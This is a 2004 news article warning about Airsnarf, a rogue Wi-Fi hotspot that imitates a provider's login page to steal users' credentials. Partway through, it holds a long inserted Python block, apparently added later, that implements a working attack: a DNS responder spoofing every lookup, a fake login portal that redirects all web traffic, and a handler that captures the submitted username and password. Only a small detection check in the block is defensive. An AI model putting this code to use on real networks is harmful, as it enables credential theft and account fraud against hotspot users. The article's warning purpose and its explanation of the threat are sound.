Watch out! That's not a real hotspot!

by Guy Kewney | posted on 19 May 2004

You're in a public hotspot, and logging onto the Internet. ID and password? Sure. Connected! Well, yes, but that's not all. You may have logged onto an Airsnarf box, which is busily faking the connection, and meanwhile, stealing all your details.


And the danger is this: the exploit is very attractive to juvenile hackers because, potentially, it lets several users share a single expensive subscription.

An Airsnarf box is in most respects identical to an ordinary access point. But it is a private one: it belongs to the hacker, and it logs onto the public AP as if it were an ordinary paying client. It then advertises its own network and puts up an imitation login page that looks just like the public one. It does a perfectly good job of passing your Web packets on to the real hotspot and sending the replies back to you, so everything appears to work; but it also keeps a record of the data it handles, starting with the username and password you typed into the fake login page.

"Airsnarf was developed and released to demonstrate an inherent vulnerability of public 802.11b hotspots - snarfing usernames and passwords by confusing users with DNS and HTTP redirects from a competing access point," says the instigator, at The Shmoo Group.

Behind the fake portal it uses network address translation (NAT), so the real hotspot sees one paying client where there may in fact be several. "Basically, it's just a shell script that uses open source software to create a competing hotspot complete with a captive portal."
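The mechanism described above, as an added example written for this page and not Airsnarf's own code (which is a shell script driving the Red Hat tools listed further down): a rogue-portal DNS responder that answers every A query with the portal's own address, a portal HTTP handler that bounces every other request to the fake login page and harvests the POSTed form, and the client-side check that tells you such a resolver is sitting between you and the Internet. The addresses, hostnames, form field names and the /login path are assumptions, and the NAT forwarding to the real hotspot is not shown.

```python
import socket
import struct
from urllib.parse import parse_qs

# Added example for this page, not Airsnarf's own code. Addresses, hostnames,
# form field names and the /login path are assumptions; NAT forwarding to the
# real hotspot (iptables in the original tool) is not shown.


def build_dns_query(name, txid=0x1234):
    """Constructed sample: a standard A query for `name`, as a victim's resolver sends."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD set, one question
    labels = name.strip(".").split(".")
    qname = b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def parse_question(packet):
    """Return (txid, name, qtype, offset just past the question section)."""
    txid = struct.unpack("!H", packet[:2])[0]
    off, labels = 12, []
    while packet[off] != 0:
        n = packet[off]
        labels.append(packet[off + 1:off + 1 + n].decode())
        off += 1 + n
    qtype, _qclass = struct.unpack("!HH", packet[off + 1:off + 5])
    return txid, ".".join(labels), qtype, off + 5


def spoofed_dns_response(query, portal_ip, ttl=1):
    """Rogue-portal DNS: whatever name is asked for, the answer is the portal's own address.
    Non-A queries get an empty NOERROR reply so the client falls back to an A query."""
    txid, _name, qtype, qend = parse_question(query)
    question = query[12:qend]
    ancount = 1 if qtype == 1 else 0
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, ancount, 0, 0)  # QR, RD, RA, NOERROR
    if not ancount:
        return header + question
    # name as a pointer to offset 12 (the question), type A, class IN, short TTL
    answer = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + socket.inet_aton(portal_ip)
    return header + question + answer


def first_a_record(response):
    """What the victim's resolver sees: (txid, name, IPv4 string or None)."""
    txid, name, _qtype, off = parse_question(response)
    ancount = struct.unpack("!H", response[6:8])[0]
    if ancount == 0:
        return txid, name, None
    _rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", response[off + 2:off + 12])
    return txid, name, socket.inet_ntoa(response[off + 12:off + 12 + rdlen])


def handle_http(raw, portal_host, portal_path="/login"):
    """Rogue-portal HTTP: a request for any other host is redirected to the fake
    login page; a POST to that page yields the credentials. Returns (response, creds or None)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].split(b" ", 2)
    headers = {k.strip().lower(): v.strip()
               for k, v in (l.split(b":", 1) for l in lines[1:] if b":" in l)}
    host, want = headers.get(b"host", b""), portal_path.encode()
    if method == b"POST" and path == want:
        form = parse_qs(body.decode())
        creds = (form.get("username", [""])[0], form.get("password", [""])[0])
        # Airsnarf writes these to a log; here they are returned to the caller.
        # The "login" appears to succeed because NAT passes traffic on from now on.
        return b"HTTP/1.1 302 Found\r\nLocation: http://www.example.com/\r\nContent-Length: 0\r\n\r\n", creds
    if host != portal_host.encode() or path != want:
        location = b"http://" + portal_host.encode() + want
        return b"HTTP/1.1 302 Found\r\nLocation: " + location + b"\r\nContent-Length: 0\r\n\r\n", None
    page = (b'<form method="POST" action="' + want + b'">'
            b'<input name="username"><input name="password" type="password"></form>')
    return (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: "
            + str(len(page)).encode() + b"\r\n\r\n" + page), None


def dns_looks_hijacked(resolutions, min_names=3):
    """Client-side check: unrelated names all resolving to one address means a
    captive or rogue resolver sits between you and the Internet."""
    return len(resolutions) >= min_names and len(set(resolutions.values())) == 1


if __name__ == "__main__":
    seen = {}
    for name in ("www.example.com", "mail.example.net", "news.example.org"):
        _, n, ip = first_a_record(spoofed_dns_response(build_dns_query(name), "10.0.0.1"))
        seen[n] = ip
    print(seen, "hijacked:", dns_looks_hijacked(seen))
    _, creds = handle_http(b"POST /login HTTP/1.1\r\nHost: portal.example\r\n\r\n"
                           b"username=alice&password=s3cret", "portal.example")
    print("snarfed:", creds)
```

A legitimate captive portal behaves identically at the DNS and HTTP layer, so dns_looks_hijacked only tells you that you are behind a portal, not whose. The one thing that distinguishes the provider's real login page from a replica index.html is the provider's TLS certificate, which is why a portal that serves its login form over plain HTTP gives the user nothing to check.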

Well, at first glance the risk looks quite a low one. It lets the snarfer collect email logins, or passwords for other Internet services; but it takes quite a lot of work, compared with how much you can harvest by loosing a trojan onto the Internet.

The typical script kiddie probably doesn't want your email login. Your email would bore a SK solid in an hour. But your credit card details might be worth sitting in a coffee bar to catch.

And of course, if a bunch of kids all want access through a high-cost hotspot (such as BT OpenZone), all they have to do is set up a laptop to act as the rogue AP, and then they all log in through it, sharing the cost.

Here's the sweet part, for the kids: they can use your account to do the next log-in, once they have your password. One paid-for hour is all they need. After that, they can be any of the other subscribers who used the spot.

"With a setup like Airsnarf one can obviously create a 'replica website' of many popular, nationally recognised, pay to play hotspots. That's as simple as replacing the index.html file Airsnarf uses, with your own custom web page - one that still points its form field variables to the Airsnarf.cgi."

Set up at or near a real hotspot, the rogue AP attracts hotspot users, who associate with it and unknowingly give out their username and password for the hotspot provider's network. "The usernames and passwords can then be misused at will to utilise other hotspots of the same provider, possibly anywhere in the nation, leaving the original duped user to pay the bill."

If it catches on, it would discourage flat-rate hotspots, which are far more vulnerable. If a metered subscription is snarfed, you'll spot it on the next bill, and probably you'll be able to show that you were nowhere near most of the hotspots you appeared to use. But if you have a flat-rate subscription, you may never spot it, unless the hotspot provider creates a "single login" policy.

Then, while the snarfer is using your account, you won't be able to get on at all ...

According to the creator, Airsnarf "has been tested with" (i.e. probably requires) the following:

Red Hat Linux 9.0
kernel-2.4.20-13.9.HOSTAP.i686.rpm
iptables - Red Hat 9.0 CD 1
httpd - Red Hat 9.0 CD 1
dhcp - Red Hat 9.0 CD 2
sendmail - Red Hat 9.0 CD 1
Net::DNS Perl module

But if the exploit proves popular, it won't be long before a version is available for pocket terminals, iPaqs and so on, which would be very, very hard for the typical budget hotspot provider to spot.
